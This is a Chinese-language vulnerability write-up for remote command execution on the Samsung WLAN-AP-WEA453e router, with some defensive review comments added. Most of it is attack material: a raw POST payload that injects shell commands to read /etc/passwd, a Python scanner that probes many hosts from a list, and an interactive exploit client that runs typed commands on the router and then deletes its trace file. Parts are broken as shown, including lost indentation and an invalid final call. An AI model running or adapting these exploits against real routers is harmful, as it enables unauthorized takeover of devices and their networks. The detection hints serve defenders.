漏洞名称 | 上报日期 | 漏洞发现者 | 产品首页 | 软件链接 | 版本 | CVE编号 |
---|---|---|---|---|---|---|
WLAN-AP-WEA453e RCE三星路由器远程命令执行漏洞 | 2020-8 | 未知 | https://www.Samsung.com | 三星WLAN-AP-WEA453e路由器 |
利用 Burp 构造如下特殊请求。排查时可在 Web 访问日志或流量中检索针对 `/(download)/` 路径的 POST 请求，以及请求体中的 `command1=shell:` 字段：
POST /(download)/tmp/a.txt HTTP/1.1
Host: xxx.xxx.xxx.xxx
command1=shell:cat /etc/passwd| dd of=/tmp/a.txt
#filename: Check.py
#Usage: python3 Check.py ip.txt
import requests
import sys
import datetime
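def CheckVuln(host):
    """Probe one host for the command-injection endpoint and record the verdict.

    A single POST is sent to ``<host>/(download)/tmp/a.txt`` with a
    ``command1=shell:...`` form field. The host is reported as vulnerable when
    the reply is HTTP 200 and its body contains the string ``root``.

    Args:
        host: Base URL including the scheme, without a trailing slash.

    Returns:
        None. The verdict line is printed and appended to the log via OutPut.

    Side effect on the device: the payload redirects the command output to
    ``/tmp/a.txt`` and nothing in this function removes that file afterwards.
    """
    vurl = host + '/(download)/tmp/a.txt'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
        'Connection': 'close',
    }
    data = {'command1': 'shell:ls|dd of=/tmp/a.txt'}

    try:
        # NOTE(review): a 1-second timeout means a slow device is logged as
        # "Network Error" rather than being assessed; such lines deserve a re-test.
        req = requests.post(url=vurl, data=data, verify=False, headers=headers, timeout=1)
    except requests.RequestException:
        # Only transport/HTTP failures are treated as a network error. The
        # original bare ``except`` also swallowed Ctrl-C and log-write errors,
        # which made a long run uninterruptible and mislabelled local faults.
        T = host + '[-]-----Network Error'
    else:
        # NOTE(review): the marker is the bare word "root" in the output of
        # ``ls``; any HTTP 200 page that happens to contain "root" is counted
        # as vulnerable, so positive results should be confirmed manually.
        if req.status_code == 200 and 'root' in req.text:
            T = '[*]-' + host + '-----Vulnerable!'
        else:
            T = '[-]-' + host + '-----Not Vulnnerable'

    print(T)
    OutPut(T)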
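def OutPut(F):
    """Append one result line to today's log file in the working directory.

    The file is named after the local date (``YYYY-MM-DD.txt``), so every run
    on the same day appends to the same file.

    Args:
        F: Text to record; a newline is added after it.
    """
    log_name = datetime.datetime.now().strftime('%Y-%m-%d') + '.txt'
    # The context manager closes the handle even when the write fails; UTF-8
    # matches the encoding used to read the host list.
    with open(log_name, 'a', encoding='utf-8') as log:
        log.write(F + '\n')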
# Read a host list and run CheckVuln on every non-blank line.
# path: text file opened as UTF-8 and iterated line by line (the usage line calls it ip.txt).
def GetUrl(path):
with open(path,'r',encoding='utf-8') as f:
for i in f:
if i.strip() != '':
oldh = i.strip()
#print(oldh)
# Every entry is prefixed with plain http://, so HTTPS-only management
# interfaces are not covered by this check.
host = 'http://'+oldh
CheckVuln(host)
# NOTE(review): indentation was lost on this page, so it is unclear whether
# this `else` pairs with the `if` (message printed for each blank line) or with
# the `for` (message printed once the loop finishes) - confirm against the
# original file.
else:
print(path+'Empty File')
# Script entry: exactly one argument is expected, the path of the host list.
if len(sys.argv) == 2:
    path = sys.argv[1]
    GetUrl(path)
else:
    print('-------------Usage:python3 Check.py ip.txt----------------- ')
    sys.exit()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import sys
import os
from urllib3.exceptions import InsecureRequestWarning
# Interactive client for the command-injection endpoint. Every method POSTs a
# raw `command1=shell:...` body to `<target>(download)/tmp/hello.txt`.
#
# Artefacts visible in this code that are useful for detection and triage:
#   - POST requests whose path ends in `(download)/tmp/hello.txt`
#   - request bodies that start with `command1=shell:`
#   - the file /tmp/hello.txt on the device (Clean removes it with `busybox rm -f`)
#   - no headers are passed to requests.post, so the library's default
#     User-Agent is sent
# Certificate verification is disabled on every request (verify=False) and the
# matching urllib3 warning is silenced in __init__.
class exp:
# Send a fixed `cat /etc/passwd` probe. Returns True when the reply is HTTP 200
# and contains 'root:', False otherwise. On any exception it prints a message
# and falls through, returning None, which also ends the `is True` loop below.
def Checking(self):
try:
Url = self.target + "(download)/tmp/hello.txt"
CkData = "command1=shell:cat /etc/passwd| dd of=/tmp/hello.txt"
response = requests.post(url = Url,data = CkData,verify = False,timeout = 20)
if(response.status_code == 200 and 'root:' in response.text):
return True
else:
return False
except Exception as e:
#print("checking")
print("[-] Server Error!")
# Prompt loop: each line typed at "# " is sent to the device and the response
# body is printed. 'exit' and Ctrl-C both call Clean() before leaving; 'cls'
# runs the local `cls` command and sends nothing.
def Exploit(self):
Url = self.target + "(download)/tmp/hello.txt"
while True:
try:
command = input("# ")
if(command == 'exit'):
self.Clean()
sys.exit()
if(command == 'cls'):
os.system("cls")
continue
# The typed text is concatenated into the request body unmodified.
data = "command1=shell:" + command + "| dd of=/tmp/hello.txt"
response = requests.post(url = Url,data = data,verify = False,timeout = 20)
# NOTE(review): response.text is presumably always a str, so this branch looks
# unreachable; an empty reply would be printed as an empty line - confirm.
if(response.text == None):
print("[!] Server reply nothing")
else:
print(response.text)
except KeyboardInterrupt:
self.Clean()
exit()
# Any other failure, including timeouts and connection errors, is reported with
# the same "not suport this command" message.
except Exception as e:
print("[-] Server not suport this command")
# Ask the device to delete /tmp/hello.txt. On HTTP 200 the process exits via
# sys.exit(); SystemExit is not an Exception subclass, so the handler below
# does not intercept it.
def Clean(self):
Url = self.target + "(download)/tmp/hello.txt"
try:
CleanData = "command1=shell:busybox rm -f /tmp/hello.txt"
response = requests.post(url = Url,data = CleanData,verify = False,timeout = 10)
if(response.status_code == 200):
print("[+] Clean target successfully!")
sys.exit()
else:
print("[-] Clean Failed!")
except Exception as e:
print("[-] Server error!")
# Store the target and silence the InsecureRequestWarning that verify=False
# would otherwise raise. `port` is accepted but never read in this class.
def __init__(self,target,port):
self.target=target
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# NOTE(review): indentation was lost on this page; the lines below reference
# `self`, so they presumably belong to __init__ - confirm against the original.
# A third command-line argument selects a module; only 'clean' is recognised.
if(len(sys.argv) == 3):
module = sys.argv[2]
if(module == 'clean'):
self.Clean()
else:
print("[-] module error!")
# The prompt loop starts only while the probe in Checking() returns exactly True.
while self.Checking() is True:
self.Exploit()
# NOTE(review): the first argument is written as a bare dotted address rather
# than a quoted string, so this line is not valid Python as shown. The second
# argument (port) is accepted by exp.__init__ but never read there.
exp(192.168.10.1,80)